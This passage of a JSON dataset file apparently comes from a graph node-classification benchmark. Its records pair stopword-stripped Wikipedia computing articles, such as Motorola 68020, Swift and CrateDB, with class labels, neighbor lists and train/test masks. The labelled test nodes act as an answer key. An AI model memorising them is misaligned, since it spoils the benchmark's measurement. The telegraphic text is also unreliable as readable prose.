quotient 32 bits remainder instructions bit field manipulations 68000 'supervisor mode meet popek goldberg virtualization requirements due single instruction 'move sr unprivileged sensitive 68010 later made privileged better support virtualization software new addressing modes added scaled indexing another level indirection many pre-existing modes added quite bit flexibility various indexing modes operations though intended new modes made 68020 suitable page printing laser printers early 1990s 68ec020 core 68020 small 256-byte direct-mapped instruction cache arranged 64 four-byte entries although small still made significant difference performance many applications resulting decrease bus traffic particularly important systems relying heavily dma 68020 used apple macintosh ii macintosh lc personal computers sun 3 workstations commodore amiga 1200 hewlett-packard 8711 series network analyzers later members hp 9000/300 family alpha microsystems am-2000 also 68020 alternative upgrade sinclair ql computer 68008 super gold card interface miracle systems amiga 2500 a2500ux shipped a2620 accelerator using 68020 68881 floating point unit 68851 memory management unit 2500ux shipped amiga unix requiring '020 '030 processor number digital oscilloscopes mid-80s late-90s used 68020 including lecroy 9300 series higher end models including c suffix models used powerful 68ec030 9300 models 68020 processor upgraded 68ec030 change cpu board earlier lecroy 9400 series models excluding 9400/9400a used 68000 along certain tektronix tds series models.. hp 54520 54522 54540 54542 also use 68020 together 68882 math coprocessor also processor used board tgv trains decode signalling information sent trains rails used flight control radar systems eurofighter typhoon combat aircraft nortel networks dms-100 telephone central office switch also used 68020 first microprocessor supernode computing core information instructions architecture see motorola 68000 68ec020 lower cost version motorola 68020 main difference two 68ec020 24-bit address bus rather 32-bit address bus full 68020 thus able address 16 mb memory commodore amiga 1200 computer amiga cd32 games console used cost-reduced 68ec020 namco system 22 taito f3 arcade boards also used processor atari jaguar ii prototype also featured replace 68000 original atari jaguar console also found use laser printers apple used laserwriter iiɴᴛx kodak used ektaplus 7016ps dataproducts used lzr 1260 2014 rochester electronics re-established manufacturing capability 68020 microprocessor still available today",
    "neighbors": [
      5378,
      7299,
      3844,
      4741,
      1158,
      4868,
      5384,
      137,
      7302,
      3467,
      1548,
      7305,
      10501,
      6415,
      5264,
      7830,
      11286,
      921,
      3098,
      2073,
      7065,
      7709,
      2334,
      8480,
      7842,
      6821,
      8102,
      1576,
      4144,
      5297,
      11314,
      1461,
      11447,
      1592,
      8761,
      2874,
      6715,
      1983,
      576,
      7104,
      5058,
      9665,
      10051,
      10436,
      10945,
      3017,
      2638,
      336,
      8530,
      3540,
      8534,
      3932,
      1376,
      3296,
      3936,
      6624,
      7269,
      4076,
      9964,
      10734,
      1776,
      3185,
      4465,
      5235,
      8048,
      10224,
      3319,
      8058,
      8700,
      8190
    ],
    "mask": "None"
  },
  {
    "node_id": 7287,
    "label": 5,
    "text": "Address_Book_Server:address book server address book server dates back several years inclusion feature share contacts 10.6 server product based sync services synchronised contacts network macintosh computers thus allowing contacts present local address book manner contacts server friendly web interface used provide access windows linux remote users product confused address book server included snow leopard server 10.6 unlike apple offering address book server offers features web interface supports 10.4 10.5 10.6 10.7 address book server consists two separate components one server side package requires installation dedicated server client components installs panel system preferences installed server publish presence local network using bonjour accessed via safari bookmarks client requires basic configuration enabled contacts calendar events synchronised published server published records accessed via server web interface stage clients also enabled synchronise local records server basic setup address book server consist clients periodically synchronising server synchronisation changes entire data set fetched form server via sync services compared local records present server differences local records received form server sent back server update central database details address book server available website project abandoned 2010 longer undergoing development",
    "neighbors": [
      823
    ],
    "mask": "None"
  },
  {
    "node_id": 7288,
    "label": 1,
    "text": "CrateDB:cratedb cratedb distributed sql database management system integrates fully searchable document oriented data store open-source written java based shared nothing architecture designed high scalability includes components facebook presto apache lucene elasticsearch netty cratedb project started jodok batlogg open source contributor creator contributed open source initiative vorarlberg lovely systems dornbirn software open source clustered database used fast text search analytics company called crate.io raised first round financing april 2014 4m round march 2016 2.5m round january 2017 dawn capital draper esprit speedinvest sunstone capital june 2014 crate.io judge choice award gigaom structure launchpad competition october 2014 win techcrunch disrupt europe london cratedb 1.0 released december 2016. reported one million downloads cratedb 2.0 enterprise edition released may 2017 cratedb language sql uses document-oriented approach nosql style databases software uses sql parser facebook presto query analysis distributed query engine elasticsearch lucene used transport protocol cluster discovery netty asynchronous event driven network application framework cratedb offers automatic data replication self-healing clusters high availability cratedb includes built-in administration interface command line interface crate shell – crash allows interactive queries python client advanced features sqlalchemy integration",
    "neighbors": [
      3,
      9828,
      5034,
      5612,
      5677,
      7983,
      4817,
      6458,
      6943
    ],
    "mask": "Train"
  },
  {
    "node_id": 7289,
    "label": 4,
    "text": "Digital_self-defense:digital self-defense digital self-defense use self-defense strategies internet users ensure digital security say protection confidential personal electronic information internet security software provides initial protection setting firewall well scanning computers malware viruses trojan horses worms spyware however information risk includes personal details birthdates phone numbers bank account schooling details sexuality religious affiliations email addresses passwords information often openly revealed social networking sites leaving internet users vulnerable social engineering possibly internet crime mobile devices especially wi-fi allow information shared inadvertently digital self-defense requires internet users take active part guarding personal information four key strategies frequently suggested assist protection computer security context referring internet security software ongoing security private information requires frequent updating virus spyware definitions ongoing developments malicious software interfere copy private information practice utilising one email account separate personal business usage recreational usage strategy commonly used manage personal privacy free ready availability email accounts sites yahoo google hotmail allows protection personal identity use different names identify email account throw-away accounts discarded replaced providing another level protection username required set email accounts open accounts various official commercial recreational social networking sites many cases email address may also utilised username usernames correlate personal information names nicknames risk ones cryptic anonymous particularly social recreational sites password mandatory security measure accompanies usernames use personal data construct passwords i.e family members ’ names pet ’ names birth dates increases risk confidential information easier crack long complicated passwords password strength key strategy protecting personal information password weak strong weak password cutekittens strong password lacpas56ikms according microsoft ideal password least 14 characters length letters punctuation symbols numbers complexity added inclusion uppercase letters social networking sites offer greater security risks personal electronic information sensitive private confidential information personal identifiers routinely used create public profiles many websites give options suppress amount personal information revealed customisation privacy settings however privacy settings reset changes website occur",
    "neighbors": [
      3941,
      8998,
      10392,
      2041,
      7515
    ],
    "mask": "None"
  },
  {
    "node_id": 7290,
    "label": 2,
    "text": "Windows_DVD_Maker:windows dvd maker windows dvd maker dvd authoring utility developed microsoft first released 2007 windows vista utility allows users create dvd slideshows videos playback media devices dvd player comparable apple idvd released 2001 dvd maker removed windows 8 windows dvd maker first reported paul thurrott windows hardware engineering conference 2003 thurrott stated windows vista known codename longhorn would support dvd movie creation independent application shell information accompanied additional reports windows vista would support major dvd packet writing formats mount rainier would also eliminate staging burning steps writing optical media—files copied recordable media would instead written immediately latter functionality exposed via live file system windows dvd maker available home premium enterprise ultimate editions windows vista well home premium professional enterprise ultimate editions windows 7 simple aero wizard-style user interface takes user process creating dvd-video first step involves importing video files arranging play proper order windows dvd maker automatically splits videos scenes accessed special scene selection page dvd menu next step animated dvd menus added compilation windows dvd maker also add slide show pictures musical accompaniment transition effects many similar transition effects available windows movie maker users also customize font button styles application show interactive preview dvd look act like burned example users navigate dvd menus testing windows dvd maker designed encode video background process reduced scheduling priority ensure computer remains responsive compilation process",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      3170,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      4731,
      10879,
      8841,
      6797,
      9869,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      7342,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10989,
      10993,
      3834,
      1791,
      8959,
      11519,
      5386,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      7983,
      1844,
      9525,
      11572,
      10039,
      6972,
      3394,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      2432,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      9173,
      1498,
      5594,
      478,
      6114,
      6115,
      6637,
      9709,
      6641,
      3573,
      5119
    ],
    "mask": "Test"
  },
  {
    "node_id": 7291,
    "label": 3,
    "text": "HP_Integral_PC:hp integral pc hp integral pc hp 9807a portable unix workstation computer system produced hewlett-packard launched 1985 based motorola 68000 microprocessor running 8 mhz ran early version hp-ux operating system integral pc mains-powered portable computer 9-inch amber electroluminescent display resolution 512×255 pixels 80×28 characters also incorporated 710 kb 3.5 floppy disk drive hp thinkjet ink-jet printer standard memory capacity 256 kb rom plus 512 kb ram expandable 1.5 mb expansion slots hp-ib bus also included mechanical design based ideas de facto standard hp-85 concept upright portable computer system integrated printer floppy screen followed several companies century within integral pc cpu ram rom memory management i/o buffering system timing keyboard interface integrated single logic-board peripheral units 14 connections built using independent boards board smaller letter sized sheet make easier check boards board contains timer i/o-board two connections optional addons keyboard-interface human interface link hp-hil power supply checked tested independently graphics processor integral pc gpu custom made could drive electroluminescence display nearly every kind monitor processor provides graphical subsystem simple use drive bitmapped display gpu able draw lines rectangles alphanumerical characters hardware additionally provides hardware cursor display-ram-interface electroluminescence-display based thin-film-technique developed hp companies integral pc unusual hp-ux operating system kernel resided rom also included hp windows graphical user interface personal applications manager pam hp-ux commands utilities supplied separately floppy disk add rom provides hp-basic using rom integral pc ready run basic simply switching system",
    "neighbors": [
      7269,
      5384,
      7983,
      3350,
      1304
    ],
    "mask": "None"
  },
  {
    "node_id": 7292,
    "label": 9,
    "text": "Swift_(programming_language):swift programming language swift general-purpose multi-paradigm compiled programming language developed apple inc. ios macos watchos tvos linux z/os swift designed work apple cocoa cocoa touch frameworks large body existing objective-c code written apple products built open source llvm compiler framework included xcode since version 6 released 2014 apple platforms uses objective-c runtime library allows c objective-c c++ swift code run within one program apple intended swift support many core concepts associated objective-c notably dynamic dispatch widespread late binding extensible programming similar features safer way making easier catch software bugs swift features addressing common programming errors like null pointer dereferencing provides syntactic sugar help avoid pyramid doom swift supports concept protocol extensibility extensibility system applied types structs classes apple promotes real change programming paradigms term protocol-oriented programming similar traits swift introduced apple 2014 worldwide developers conference wwdc underwent upgrade version 1.2 2014 major upgrade swift 2 wwdc 2015 initially proprietary language version 2.2 made open-source software apache license 2.0 december 3 2015 apple platforms linux version 3.0 syntax swift went significant evolution core team making source stability focus later versions first quarter 2018 swift surpassed objective-c measured popularity swift 4.0 released 2017 introduced several changes built-in classes structures code written previous versions swift updated using migration functionality built xcode swift 5 released march 2019 introduced stable binary interface apple platforms allowing swift runtime incorporated apple operating systems source compatible swift 4 development swift started july 2010 chris lattner eventual collaboration many programmers apple swift took language ideas objective-c rust haskell ruby python c clu far many others list june 2 2014 apple worldwide developers conference wwdc application became first publicly released app written swift beta version programming language released registered apple developers conference company promise final version swift would source code compatible test version apple planned make source code converters available needed full release swift programming language free 500-page manual also released wwdc available ibooks store official website swift reached 1.0 milestone september 9 2014 gold master xcode 6.0 ios swift 1.1 released october 22 2014 alongside launch xcode 6.1 swift 1.2 released april 8 2015 along xcode 6.3 swift 2.0 announced wwdc 2015 made available publishing apps app store september 21 2015 swift 3.0 released september 13 2016 swift 4.0 released september 19 2017 swift 4.1 released march 29 2018 swift first place loved programming language stack overflow developer survey 2015 second place 2016 december 3 2015 swift language supporting libraries debugger package manager open sourced apache 2.0 license runtime library exception swift.org created host project source code hosted github easy anyone get code build even create pull requests contribute code back project december 2015 ibm announced swift sandbox website allows developers write swift code one pane display output another swift sandbox deprecated january 2018 wwdc 2016 apple announced ipad exclusive app named swift playgrounds intended teach people code swift app presented 3d video game-like interface provides feedback lines code placed certain order executed january 2017 chris lattner announced departure apple new position tesla motors swift project lead role going team veteran ted kremenek wwdc 2019 apple announced swiftui provides framework declarative ui structure design across apple platforms swift alternative objective-c language employs modern programming-language theory concepts strives present simpler syntax introduction described simply objective-c without c default swift expose pointers unsafe accessors contrast objective-c uses pointers pervasively refer object instances also objective-c use smalltalk-like syntax making method calls replaced dot-notation style namespace system familiar programmers common object-oriented oo languages like java c swift introduces true named parameters retains key objective-c concepts including protocols closures categories often replacing former syntax cleaner versions allowing concepts applied language structures like enumerated types enums cocoa cocoa touch environments many common classes part foundation kit library included nsstring string library using unicode nsarray nsdictionary collection classes others objective-c provided various bits syntactic sugar allow objects created on-the-fly within language created objects manipulated object calls instance objective-c concatenating two nsstrings required method calls similar swift many basic types promoted language core manipulated directly instance strings invisibly bridged nsstring foundation imported concatenated codice_1 operator allowing greatly simplified syntax prior example becoming swift supports five access control levels symbols codice_2 codice_3 codice_4 codice_5 codice_6 unlike many object-oriented languages access controls ignore inheritance hierarchies codice_6 indicates symbol accessible immediate scope codice_5 indicates accessible within file codice_4 indicates accessible within containing module codice_3 indicates accessible module codice_2 classes methods indicates class may subclassed outside module important new feature swift option types allow references values operate manner similar common pattern c pointer may refer value may null implies non-optional types result null-pointer error compiler ensure possible optional types created codice_12 mechanism—to make integer nullable one would use declaration similar codice_13 c swift also includes syntactic sugar allowing one indicate variable optional placing question mark type name codice_14 variables constants marked optional either value underlying type codice_15 optional types wrap base type resulting different instance codice_16 codice_17 fundamentally different types latter common codice_18 codice_16 access value inside assuming nil must unwrapped expose instance inside performed codice_20 operator case codice_20 operator unwraps codice_22 expose instance inside allowing method call made codice_22 nil null-pointer error occurs annoying practice swift also includes concept optional chaining test whether instance nil unwrap non-null case runtime calls codice_24 codice_22 nil suppressing error normally requires programmer test whether codice_26 nil proceeding origin term chaining comes common case several method calls/getters chained together instance reduced codice_27 syntax circumvents pyramid doom swift 2 introduced new keyword codice_28 cases code stop executing condition unmet using codice_28 three benefits syntax act codice_30 statement primary benefit inferring non-nullability codice_30 statement requires case codice_28 assumes case based condition provided also since codice_28 contains scope exception codice_34 closure codice_35 presented unwrapped optional guard super-scope lastly codice_28 statement test fails swift requires codice_34 exit current method loop ensuring codice_35 never accessed codice_15 performed keywords codice_40 codice_41 codice_42 codice_43 objective-c weakly typed allowed method called object time method call failed default handler runtime returned nil meant unwrapping testing needed equivalent statement objective-c would return nil could tested however also demanded method calls dynamic introduces significant overhead swift use optionals provides similar mechanism testing dealing nils way allows compiler use static dispatch unwrapping action called defined instance wrapper versus occurring runtime dispatch system many object-oriented languages objects represented internally two parts object stored block data placed heap data structure |heap name handle object represented pointer computer programming |pointer objects passed methods copying value pointer allowing underlying data heap accessed anyone copy contrast basic types like integers floating point values represented directly handle contains data pointer data passed directly methods copying styles access termed pass-by-reference case objects pass-by-value basic types concepts advantages disadvantages objects useful data large like description window contents document cases access data provided copying 32- 64-bit value versus copying entire data structure however smaller values like integers size pointers typically one word computer architecture |word advantage passing pointer versus passing value also pass-by-reference inherently requires dereferencing operation produce noticeable overhead operations typically used basic value types like mathematics similarly c contrast oo languages swift offers built-in support objects using either pass-by-reference pass-by-value semantics former using codice_44 declaration latter using codice_45 structs swift almost features classes methods implementing protocols using extension mechanisms reason apple terms data generically instances versus objects values structs support inheritance however programmer free choose semantics appropriate data structure application larger structures like windows would defined classes allowing passed around pointers smaller structures like 2d point defined structs pass-by-value allow direct access internal data dereference performance improvement inherent pass-by-value concept swift uses types almost common data types including codice_46 codice_47 types normally represented objects like codice_16 codice_49 using value types result significant performance improvements user applications well ensure even largest structs cause performance penalty handed swift uses copy write objects copied program attempts change value means various accessors effect pointer data storage data physically stored one instance memory level application values separate physical separation enforced copy write needed key feature objective-c support categories methods added extend classes runtime categories allow extending classes in-place add new functions need subclass even access original source code example might add spell checker support base codice_50 class means instances nsstring application gain spell checking system also widely used organizational technique allowing related code gathered library-like extensions swift continues support concept although termed extensions declared keyword codice_51 unlike objective-c swift also add new properties accessors types enums extant instances another key feature objective-c use protocol_ object-oriented_programming protocols known modern languages interfaces protocols promise particular class implements set methods meaning objects system call methods object supporting protocol often used modern oo languages substitute multiple inheritance although feature sets entirely similar common example protocol cocoa codice_52 protocol defines one method codice_53 implements object copying deep copy|deep copying objects objective-c languages implementing protocol concept programmer ensure required methods implemented class swift adds ability add methods using extensions use generic programming generics implement combined allow protocols written support wide variety instances also extension mechanism used add protocol conformance object list protocol definition example protocol might declared called codice_54 ensures instances conform protocol implement codice_55 method returns codice_16 swift declared code like protocol added string access base class source swift like many modern languages supporting interfaces protocols used types means variables methods defined protocol instead specific type matter sort instance codice_57 compiler ensure conforms protocol thus code safe syntax also means collections based protocols also like codice_58 swift treats structs classes similar concepts extensions protocols extensively used swift runtime provide rich api based structs instance swift uses extension add codice_59 protocol many basic types like strings arrays allowing compared codice_60 operator concrete example features interact seen concept default protocol implementations function defines method works instance conforming codice_59 providing equals function instance class struct automatically gains implementation simply conforming codice_59 many instances gain codice_59 base implementations generic extensions basic objects runtime gain equals equals code combination protocols defaults protocol inheritance extensions allows many functions normally associated classes inheritance implemented value types properly used lead dramatic performance improvements significant limits api concept widely used within swift apple begun calling protocol-oriented programming language suggest addressing many problem domains normally solved though classes inheritance using protocols structs instead swift uses runtime extant objective-c system requires ios 7 macos 10.9 higher swift objective-c code used one program extension c c++ also contrast c c++ code used directly swift objective-c c wrapper must created swift c++ case objective-c swift considerable access object model used subclass extend use objective-c code provide protocol support converse true swift class subclassed objective-c. aid development programs re-use extant code xcode 6 higher offers semi-automated system builds maintains bridging header expose objective-c code swift takes form additional header file simply defines imports objective-c symbols needed project swift code point swift refer types functions variables declared imports though written swift objective-c code also use swift code directly importing automatically maintained header file objective-c declarations project swift symbols instance objective-c file mixed project called myapp could access swift classes functions code codice_64 symbols available mechanism however—use swift-specific features like generic types non-object optional types sophisticated enums even unicode identifiers may render symbol inaccessible objective-c swift also limited support attributes metadata read development environment necessarily part compiled code like objective-c attributes use codice_65 syntax currently available set small one example codice_66 attribute marks given value code outlet available use within interface builder ib outlet device binds value on-screen display object code swift uses automatic reference counting arc memory management|manage memory apple used require manual memory management objective-c introduced arc 2011 allow easier memory allocation deallocation one problem arc possibility creating reference counting reference cycle|strong reference cycle objects reference way reach object started following references e.g references b b references causes become leaked memory never released swift provides keywords codice_67 codice_68 prevent strong reference cycles typically parent-child relationship would use strong reference child-parent would use either codice_67 reference parents children unrelated codice_68 child always parent parent may child weak references must optional variables since change become codice_15 closure within class also create strong reference cycle capturing self references self references treated weak unowned indicated using capture list key element swift system ability cleanly debugged run within development environment using read–eval–print loop repl giving interactive properties common scripting abilities python traditional system programming languages repl enhanced new concept swift playgrounds|playgrounds interactive views running within xcode environment respond code debugger changes on-the-fly swift playgrounds|playgrounds allow programmers add swift code along markdown documentation code changes time regard ranged input value view used timeline assistant demonstrate output animated way addition xcode debugging features swift development including breakpoints step step statements well ui element placement breakdowns app developers apple says swift industrial-quality programming language expressive enjoyable scripting language many features introduced swift also well-known performance safety trade-offs apple implemented optimizing compiler|optimizations reduce overhead swift similar c various ways also similarities objective-c differences objective-c include since language open-source prospects ported web web frameworks already developed ibm kitura perfect server framework |perfect vapor server-side swift |vapor official server apis work group also started apple members swift developer community playing central role second free implementation swift targets cocoa api |cocoa microsoft common language infrastructure .net framework|.net java software platform |java android operating system |android platform exists part elements compiler remobjects software category apple inc. software category computer-related introductions 2014 category object-oriented programming languages category pattern matching programming languages category programming languages category programming languages created 2014 category software using apache license category statically typed programming languages category systems programming languages",
    "neighbors": [
      10755,
      9732,
      1549,
      4111,
      5647,
      7697,
      2585,
      11289,
      3613,
      9245,
      5154,
      6186,
      2603,
      4139,
      5165,
      5677,
      6700,
      2045,
      1074,
      8754,
      5684,
      7734,
      9784,
      2617,
      3642,
      2620,
      8253,
      6718,
      576,
      5696,
      8771,
      10819,
      8773,
      8262,
      8783,
      4180,
      6228,
      10838,
      1623,
      3672,
      10841,
      4190,
      3167,
      3681,
      9826,
      11361,
      8806,
      1130,
      3691,
      7274,
      5743,
      8303,
      2673,
      8304,
      2168,
      2680,
      3705,
      5754,
      6264,
      9848,
      2686,
      6783,
      10878,
      9345,
      1666,
      5255,
      1673,
      10387,
      5783,
      5784,
      155,
      3228,
      7326,
      2207,
      10406,
      11430,
      4777,
      2735,
      3248,
      7857,
      1203,
      692,
      1715,
      7347,
      4283,
      3772,
      7869,
      8385,
      10435,
      5833,
      7889,
      7378,
      10961,
      3286,
      4822,
      9430,
      3293,
      4318,
      10973,
      228,
      6884,
      10470,
      1768,
      6377,
      9451,
      1772,
      4844,
      10478,
      10991,
      7928,
      3323,
      7420,
      4352,
      2819,
      11017,
      1290,
      784,
      10512,
      9490,
      9491,
      1300,
      1813,
      4888,
      5912,
      5917,
      8990,
      3871,
      3876,
      3367,
      10023,
      4399,
      7983,
      823,
      7991,
      2363,
      10555,
      2365,
      2366,
      9022,
      1346,
      1347,
      1348,
      10562,
      11589,
      5961,
      8524,
      847,
      10581,
      2903,
      10586,
      4957,
      8549,
      6502,
      9063,
      8554,
      9579,
      3948,
      10608,
      3960,
      8057,
      6016,
      2950,
      2439,
      3462,
      4998,
      6023,
      6539,
      7052,
      8582,
      8082,
      11674,
      1435,
      3483,
      6555,
      6046,
      10654,
      1952,
      2979,
      7076,
      11171,
      1959,
      9128,
      5546,
      8618,
      428,
      8109,
      8630,
      6074,
      2492,
      446,
      7614,
      4544,
      963,
      8644,
      2502,
      4550,
      456,
      1482,
      7629,
      7118,
      464,
      11219,
      5588,
      11221,
      8662,
      2519,
      9174,
      4057,
      2011,
      477,
      3038,
      7133,
      9182,
      4068,
      4069,
      5093,
      2023,
      9701,
      7147,
      7154,
      5619,
      3573,
      1016,
      2556,
      2557,
      6654
    ],
    "mask": "Test"
  },
  {
    "node_id": 7293,
    "label": 2,
    "text": "Composer_(software):composer software composer application-level package manager php programming language provides standard format managing dependencies php software required libraries developed nils adermann jordi boggiano continue manage project began development april 2011 first released march 1 2012 composer strongly inspired node.js npm ruby bundler project dependency solving algorithm started php-based port opensuse libzypp satsolver composer runs command line installs dependencies e.g libraries application also allows users install php applications available packagist main repository containing available packages also provides autoload capabilities libraries specify autoload information ease usage third-party code composer offers several parameters including example composer.json generated following command different authorized versions libraries defined",
    "neighbors": [
      10760,
      1034,
      6154,
      8213,
      6680,
      9245,
      5155,
      5670,
      7722,
      5677,
      10817,
      8262,
      4171,
      3667,
      6227,
      11357,
      7785,
      9324,
      1138,
      2168,
      6797,
      10900,
      10394,
      4775,
      6828,
      5819,
      190,
      6338,
      4302,
      2259,
      6361,
      8413,
      741,
      231,
      2281,
      2804,
      4853,
      6393,
      11525,
      7435,
      7947,
      9487,
      788,
      1813,
      5397,
      8476,
      2348,
      6446,
      7983,
      1842,
      823,
      2872,
      2372,
      1353,
      3918,
      4951,
      10587,
      9564,
      2401,
      1379,
      9063,
      8554,
      10096,
      8068,
      3462,
      8582,
      2955,
      9614,
      2465,
      6583,
      10172,
      9151,
      8644,
      9671,
      5578,
      5067,
      5070,
      463,
      2010,
      1501,
      3553,
      7140,
      6119,
      5096,
      7147,
      5612,
      1522,
      3573,
      11259
    ],
    "mask": "Train"
  },
  {
    "node_id": 7294,
    "label": 7,
    "text": "VOMS:voms voms acronym used virtual organization membership service grid computing structured simple account database fixed formats information exchange features single login expiration time backward compatibility multiple virtual organizations database manipulated authorization data defines specific capabilities roles users administrative tools used administrators assign roles capability information database command-line tool allows users generate local proxy credential based contents voms database credential includes basic authentication information standard grid proxy credentials contain also includes role capability information voms server voms-aware applications use voms data make authentication decisions regarding user requests voms originally developed european datagrid enabling grids e-science projects maintained italian national institute nuclear physics infn voms also acronym voucher management system used providing recharge management services prepaid systems telecom service providers typically external voucher management systems used intelligent network based prepaid systems",
    "neighbors": [
      160,
      3331,
      5956,
      2558,
      7935
    ],
    "mask": "Train"
  },
  {
    "node_id": 7295,
    "label": 4,
    "text": "NitroSecurity:nitrosecurity nitrosecurity inc. privately held united states-based provider security information event management siem technology nitrosecurity headquarters located portsmouth new hampshire usa sales offices throughout united states united kingdom primary software engineering development siem products idaho falls idaho acquired mcafee 2011 engineering siem products continue developed mcafee idaho falls 2010 inc. magazine rated nitrosecurity 523 inc. 5,000 list fastest-growing companies nitrosecurity develops security information event management siem tools identify correlate remediate information security threats product names nitroview esm nitroview elm nitroview adm nitroview dbm nitroguard ips",
    "neighbors": [
      704,
      11611,
      2656
    ],
    "mask": "None"
  },
  {
    "node_id": 7296,
    "label": 2,
    "text": "Modern_Operating_Systems:modern operating systems modern operating systems book written andrew tanenbaum version target implementation book 4th edition published march 2014 modern operating systems mostly known mos popular book across globe includes fundamentals operating system small amounts code written autonomous c language mos describes many scheduling algorithms",
    "neighbors": [
      7983,
      2045,
      7279
    ],
    "mask": "Test"
  },
  {
    "node_id": 7297,
    "label": 4,
    "text": "Fabrik_Inc.:fabrik inc. fabrik inc. manufacturer external hard drives digital content management software services fabrik said third largest supplier external storage products north america 2007 headquartered san mateo offices santa ana culver city california company sells external hard drives online backup software bundled product consumers small business users audio/video a/v content creation professionals company also hosts free online digital content management sharing site joggle fabrik product lines include simpletech g-technology joggle fabrik ultimate backup fabrik founded web-based software company august 2005 former maxtor executives mike cordano keyur patel anaal udaybabu designed brand identity on-the-web storage following month company disclosed completion series funding 4.1 million followed 8 million series b funding july 2006 14.3 million february 2007 may 2007 company received 24.9 million funding bringing total 51.3 million funding february 2006 fabrik partnered maxtor acquired seagate 2005 develop maxtor fusion network-attached storage nas device built organizing sharing digital files late 2006 company launched myfabrik.com organized stored digital media online february 2007 company acquired consumer business simpletech inheriting simpletech product line external hard drives consumers small businesses january 2008 fabrik acquired g-technology inherited suite external hard drives mac creative pro photography a/v markets including firewire esata usb scsi fibre channel storage products fabrik acquisitions introduction joggle demo conference january 2008 created four brands simpletech g-technology joggle fabrik ultimate backup simpletech g-technology products still branded maintained separate online website entities february 23 2009 hitachi global storage technologies announced agreed acquire fabrik point fabrik revenue year 2009 estimated 350m 400m range growing 40 yearly basis april 6 2009 hitachi global storage technologies completed acquisition formed core hitachi gst new branded business division following acquisition subsidiary branded g-technology hitachi company simpletech products external hard drives mainstream consumers small business users includes portable external hard drives desktop external hard drives simpletech products come bundled free local backup software online backup capabilities simpletech drive 100 percent recyclable enclosure several energy resource efficiency features company claims drive world eco-friendly resource conscious external hard drive original design simpletech portable external storage product line inspired ferrari design team pininfarina fabrik started free online digital content management site called joggle early 2008 web site searches video photos music user computer external hard drive online communities networking sites automatically consolidates single online organizing sharing tool company also pure online backup approach fabrik ultimate backup data backed remote servers using 128-bit ssl blowfish encryption",
    "neighbors": [
      2432,
      8900,
      3366,
      3629,
      1298
    ],
    "mask": "Test"
  },
  {
    "node_id": 7298,
    "label": 4,
    "text": "Kemp_Inc:kemp inc kemp inc. founded 2000 bethpage new york operates application delivery controller industry company builds load balancing products balances user traffic multiple application servers physical virtual cloud environment 2010 kemp opened european headquarters limerick ireland edison ventures kennet partners orix venture finance invested 16 million company research development sales marketing early 2012 april 2014 kemp announced investment limerick operations expand 30 positions 80 kemp recognized visionary 2015 gartner magic quadrant application delivery controllers 2016 2019 kemp purchased private equity firm mill point capital kemp software company develops load balancing application delivery software built linux operating system sold loadmaster brand 2017 40,000 customer deployments loadmaster need high availability scalability security visibility applications enables customers scale operations delivering applications layer 4 7 load balancing enhanced performance secure access loadmaster software-based load balancer adc available virtualized appliance well cloud including azure aws others kemp main product loadmaster load balancer built proprietary software platform called lmos enables run almost platform kemp loadmaster appliance virtual loadmaster vlm deployed hyper-v vmware bare metal public cloud kemp available azure top 15 deployed applications well aws vmware vcloud air 2013 kemp announced adding pre-authorization single sign-on sso persistent logging product range tmg alternative kemp ’ dns based global site load balancer gslb enables customers provide availability scaling resilience applications geographically distributed including data center environments private clouds multi-public cloud environments azure aws well hybrid environments applications deployed across public private cloud capabilities provided geo loadmaster similar hosted services dyn dns march 2014 kemp announced availability microsoft azure cloud platform first 3rd party load balancer available vlm azure loadmaster virtual load balancer may 2016 kemp launched centralized application monitoring reporting product called kemp 360 central™ allows network application administrators view state different load balancers application delivery controllers views include throughput users transactions per second product allows users connect 3rd party devices like f5 nginx haproxy time launching kemp 360 central kemp also announced general release 360 vision monitors health applications 360 vision monitors patterns application data statistics able provide pre-emptive health alerts designed prevent application outages march 2015 kemp launched free version loadmaster software called free loadmaster fully featured load balancer shares commercial product features including full layer 4 layer 7 load balancing reverse proxy web content caching compression non-commercial waf web application firewall 20mbps kemp announced launched world first software defined network sdn ready adaptive load balancer september 2014 kemp announced joining opendaylight open source sdn project kemp introduced service mesh part offering 2018 listed company watch techtarget",
    "neighbors": [
      8204,
      277
    ],
    "mask": "Test"
  },
  {
    "node_id": 7299,
    "label": 3,
    "text": "Motorola_68030:motorola 68030 motorola 68030 sixty-eight-oh-thirty 32-bit microprocessor motorola 68000 family released 1987 68030 successor motorola 68020 followed motorola 68040 keeping general motorola naming cpu often referred 030 pronounced oh-three-oh oh-thirty 68030 features 273,000 transistors on-chip instruction data caches 256 bytes also on-chip memory management unit mmu built floating-point unit fpu 68881 faster 68882 floating point unit chips could used 68030 lower cost version 68030 motorola 68ec030 also released lacking on-chip mmu commonly available 132 pin qfp 128 pin pga packages poorer thermal characteristics qfp package limited full 68030 qfp variant 33 mhz pga 68030s included 40 mhz 50 mhz versions also small supply qfp packaged ec variants microarchitecture 68030 basically 68020 core additional 256 byte data cache process shrink added burst mode caches four longwords placed cache without cpu intervention motorola used process shrink pack hardware die case mmu mostly completely compatible external 68851 integration mmu made cost-effective 68020 external mmu also allowed 68030 access memory one cycle faster 68020/68851 combo however 68030 switch synchronous asynchronous buses without reset 68030 also lacks 68020 instructions increases performance ≈5 reducing power draw ≈25 compared 68020 68030 used 68020 bus case performance similar 68020 derived however 68030 provides additional synchronous bus interface used accelerates memory accesses 33 compared equally clocked 68020 finer manufacturing process allowed motorola scale full-version processor 50 mhz ec variety topped 40 mhz 68030 used many models apple macintosh ii commodore amiga series personal computers next cube later alpha microsystems multiuser systems descendants atari st line atari tt atari falcon also used unix workstations sun microsystems sun-3x line desktop workstations earlier sun3 used 68020 laser printers nortel networks dms-100 